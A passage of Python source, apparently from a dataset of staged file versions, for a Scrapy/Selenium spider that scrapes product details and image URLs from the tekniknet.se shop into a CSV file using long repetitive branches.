list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 5:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 6:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 7:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 8:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 9:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 10:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 11:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 12:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 13:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 14:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 15:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 16:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 17:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +\n list3[k] + '\\n')\n elif len(csv_image_url) >= 18:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + csv_image_url[17] + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error3')\n for m in range(0, len(list4)):\n try:\n if list4[m] not in old_product_url:\n self.loggger.info('********************** ' + str(\n k) + ' ******************************')\n self.driver.get(list4[m])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n offer = self.driver.find_element_by_id('productPageUpper')\n try:\n heading = offer.find_element_by_class_name('pHeader')\n csv_heading = heading.text.replace(',', '.')\n except:\n self.loggger.info('heading4 non-exist')\n csv_heading = ''\n try:\n stock = offer.find_element_by_class_name('instock')\n csv_stock = stock.text\n except:\n csv_stock = 'Out of stock'\n self.loggger.info('stock4 non-exist')\n try:\n price_new = offer.find_element_by_class_name(\n 'priceRegular')\n csv_price_new = price_new.text.split(' ')[0]\n except:\n try:\n price_new = offer.find_element_by_class_name(\n 'priceNew')\n csv_price_new = price_new.text.split(' ')[0]\n price_old = offer.find_element_by_class_name(\n 'priceOld')\n csv_price_old = price_old.text.split(' ')[0]\n except:\n self.loggger.info('price4 non-exist')\n csv_price_new = ''\n csv_price_old = ''\n try:\n desc = offer.find_element_by_id('pDesc')\n csv_desc = desc.get_attribute('innerHTML').replace(',',\n '-').replace('\\n', ' ').replace('\\r', '').rstrip(\n ).lstrip()\n except:\n self.loggger.info('description4 non-exist')\n csv_desc = ''\n try:\n article_number = offer.find_element_by_id(\n 'pManufacturer')\n csv_article_number = article_number.text.split(' ')[-1\n ].replace(',', '.')\n except:\n self.loggger.info('article number4 non-exist')\n csv_article_number = ''\n try:\n pimages = offer.find_elements_by_xpath('.//img')\n csv_image_url = []\n for pimage in pimages:\n image_url = pimage.get_attribute('src')\n if image_url not in csv_image_url:\n csv_image_url.append(image_url)\n except:\n self.loggger.info('image4 non-exist')\n if len(csv_image_url) == 1:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 2:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 3:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4\n [m] + '\\n')\n elif len(csv_image_url) == 4:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 5:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 6:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 7:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4\n [m] + '\\n')\n elif len(csv_image_url) == 8:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 9:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 10:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 11:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4\n [m] + '\\n')\n elif len(csv_image_url) == 12:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 13:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 14:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4\n [m] + '\\n')\n elif len(csv_image_url) == 15:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 16:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 17:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +\n list4[m] + '\\n')\n elif len(csv_image_url) >= 18:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + csv_image_url[17] + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error4')\n file.close()\n self.driver.close()\n",
"step-3": "<mask token>\noutput_timestamp = datetime.today().strftime('%Y-%m-%d-%H%M')\nlog_output_file = 'scrape-order-images-{}.log'.format(output_timestamp)\n\n\nclass ProductSpider(scrapy.Spider):\n name = 'tekniknet_new'\n allowed_domains = ['www.tekniknet.se']\n start_urls = ['https://www.tekniknet.se/#']\n\n def __init__(self):\n options = webdriver.ChromeOptions()\n options.add_argument('--start-maximized')\n self.driver = webdriver.Chrome(chrome_options=options)\n\n def parse(self, response):\n fh = logging.FileHandler(log_output_file)\n fh.setLevel(logging.INFO)\n logging.getLogger('selenium.webdriver.remote.remote_connection'\n ).setLevel(logging.WARNING)\n logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n logging.getLogger('selenium.webdriver.remote.remote_connection'\n ).addHandler(fh)\n 